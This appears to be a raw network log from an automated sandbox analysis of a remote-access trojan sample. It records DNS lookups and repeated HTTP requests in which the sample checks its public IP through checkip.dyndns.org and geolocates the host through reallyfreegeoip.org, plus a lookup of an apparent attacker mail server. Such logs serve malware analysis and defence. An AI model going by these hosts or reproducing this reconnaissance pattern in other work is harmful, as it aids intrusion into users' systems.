            Jul 26, 2024 11:39:04.877788067 CEST | 58360 | 53 | 192.168.2.5 | 1.1.1.1
            Jul 26, 2024 11:39:04.886856079 CEST | 53 | 58360 | 1.1.1.1 | 192.168.2.5
            Jul 26, 2024 11:39:20.246893883 CEST | 52624 | 53 | 192.168.2.5 | 1.1.1.1
            Jul 26, 2024 11:39:20.589668989 CEST | 53 | 52624 | 1.1.1.1 | 192.168.2.5
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Jul 26, 2024 11:38:59.371063948 CEST | 192.168.2.5 | 1.1.1.1 | 0x1f25 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:39:04.877788067 CEST | 192.168.2.5 | 1.1.1.1 | 0x620d | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:39:20.246893883 CEST | 192.168.2.5 | 1.1.1.1 | 0x53de | Standard query (0) | mail.erkanlarofis.com.tr | A (IP address) | IN (0x0001) | false
            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Jul 26, 2024 11:38:59.445704937 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f25 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | - | CNAME (Canonical name) | IN (0x0001) | false
            Jul 26, 2024 11:38:59.445704937 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f25 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:38:59.445704937 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f25 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:38:59.445704937 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f25 | No error (0) | checkip.dyndns.com | - | 193.122.6.168 | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:38:59.445704937 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f25 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:38:59.445704937 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f25 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:39:04.886856079 CEST | 1.1.1.1 | 192.168.2.5 | 0x620d | No error (0) | reallyfreegeoip.org | - | 188.114.97.3 | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:39:04.886856079 CEST | 1.1.1.1 | 192.168.2.5 | 0x620d | No error (0) | reallyfreegeoip.org | - | 188.114.96.3 | A (IP address) | IN (0x0001) | false
            Jul 26, 2024 11:39:20.589668989 CEST | 1.1.1.1 | 192.168.2.5 | 0x53de | No error (0) | mail.erkanlarofis.com.tr | erkanlarofis.com.tr | - | CNAME (Canonical name) | IN (0x0001) | false
            Jul 26, 2024 11:39:20.589668989 CEST | 1.1.1.1 | 192.168.2.5 | 0x53de | No error (0) | erkanlarofis.com.tr | - | 77.245.159.7 | A (IP address) | IN (0x0001) | false
            • reallyfreegeoip.org
            • checkip.dyndns.org
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.5 | 49706 | 158.101.44.242 | 80 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 26, 2024 11:38:59.511497021 CEST | 151 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:01.480242014 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:01 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: f8553c7613fd4c2c917d768e17b67a2d
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 26, 2024 11:39:01.486656904 CEST | 127 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 26, 2024 11:39:04.847099066 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:04 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 4bee44812ef03ede1e946b9e6fbc3aef
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 26, 2024 11:39:05.559277058 CEST | 127 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 26, 2024 11:39:05.731045961 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:05 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 9704821eddf53b5eb899522d421ef23f
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.5 | 49712 | 158.101.44.242 | 80 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 26, 2024 11:39:06.413347006 CEST | 127 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Jul 26, 2024 11:39:06.989404917 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:06 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 25587af39e0d567b321045d2c6246783
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.5 | 49714 | 158.101.44.242 | 80 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 26, 2024 11:39:07.690953970 CEST | 151 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:08.324615955 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:08 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: db7e2095471602765a649e5f79ed7e69
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            3 | 192.168.2.5 | 49716 | 158.101.44.242 | 80 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 26, 2024 11:39:08.947376013 CEST | 151 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:09.533092022 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:09 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: c8c9810e359b7534489d2aa7a985bf96
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            4 | 192.168.2.5 | 49718 | 158.101.44.242 | 80 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 26, 2024 11:39:10.185650110 CEST | 151 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:10.778944969 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:10 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 1efff3dca87174f3c0a4f16af43c8da5
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            5 | 192.168.2.5 | 49720 | 158.101.44.242 | 80 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 26, 2024 11:39:11.485342979 CEST | 151 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:12.280565977 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:12 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 572deb602e5b95ce4723bc9f5750b5d3
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
            Jul 26, 2024 11:39:12.301397085 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:12 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 572deb602e5b95ce4723bc9f5750b5d3
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            6 | 192.168.2.5 | 49722 | 158.101.44.242 | 80 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            Jul 26, 2024 11:39:12.917669058 CEST | 151 | OUT | GET / HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
            Host: checkip.dyndns.org
            Connection: Keep-Alive
            Jul 26, 2024 11:39:13.480638027 CEST | 320 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:13 GMT
            Content-Type: text/html
            Content-Length: 103
            Connection: keep-alive
            Cache-Control: no-cache
            Pragma: no-cache
            X-Request-ID: 33e9b6d1def81d96ff656bc8a2e385cf
            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.5 | 49710 | 188.114.97.3 | 443 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-26 09:39:05 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-26 09:39:05 UTC | 711 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:05 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9358
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j4AaaMvqLJk3JK8HiccFhYv7%2F8e9H0I%2F0exA80WaVYABu0Uv2Hf9parSO1sWJ6F8FvND%2BLGNVgaUV2USia3XM2l%2BpM6dPqmXRqKY2U%2F1TbIj5Er5MOV%2FS6hDj5ly48JYJKn0gLmK"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936ba74b4d7c81-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:05 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.5 | 49711 | 188.114.97.3 | 443 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-26 09:39:06 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-26 09:39:06 UTC | 705 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:06 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9359
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tP2ojCoyh0j5hk4LQw389SHgTjjTIsQ4ALXbPz8if1JGha34vw6fR45v1IvnOMxpwY%2FkQNkQ6%2FEZ0AAz92jSjVwkjEyOlQ7RmIqWyo%2BAApqANJDYDO6he7qweWOfeTvXSJGICdtx"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bac8ba58c1d-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:06 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-26 09:39:07 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-26 09:39:07 UTC | 703 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:07 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9360
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xiwUuMv3Y6GnMjlAvHz3BmXzVXXGEuESNndMJHRUzUwPaIL6%2B6jVyTFsZqwiAabJKhyDejTMw8FNftDsuB8GkvPRRaSRAuglzCOjQ3c7XHtnrSW3pTZXyZzeGHRVg0Q41pUkIOh%2B"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bb47ece177c-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:07 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            3 | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-26 09:39:08 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            2024-07-26 09:39:08 UTC | 707 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:08 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9361
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nja%2BlfklVO8eatAurvtWjNybmKy2lA0yrOx3L%2FhtyNLHz%2BC8tFhlafBjXVF2IDdtox5dDa4HBRMgz04seE4F8lRlwFva1mK22qoBjPTZTNQIxxC2mm1Cm6XrPU5icRVaMCRJ%2BtHn"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 8a936bbc786619fb-EWR
            alt-svc: h3=":443"; ma=86400
            2024-07-26 09:39:08 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
            2024-07-26 09:39:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            4 | 192.168.2.5 | 49717 | 188.114.97.3 | 443 | 4040 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe
            Timestamp | Bytes transferred | Direction | Data
            2024-07-26 09:39:10 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
            Host: reallyfreegeoip.org
            Connection: Keep-Alive
            2024-07-26 09:39:10 UTC | 705 | IN | HTTP/1.1 200 OK
            Date: Fri, 26 Jul 2024 09:39:10 GMT
            Content-Type: application/xml
            Transfer-Encoding: chunked
            Connection: close
            access-control-allow-origin: *
            vary: Accept-Encoding
            Cache-Control: max-age=86400
            CF-Cache-Status: HIT
            Age: 9363
            Last-Modified: Fri, 26 Jul 2024 07:03:07 GMT
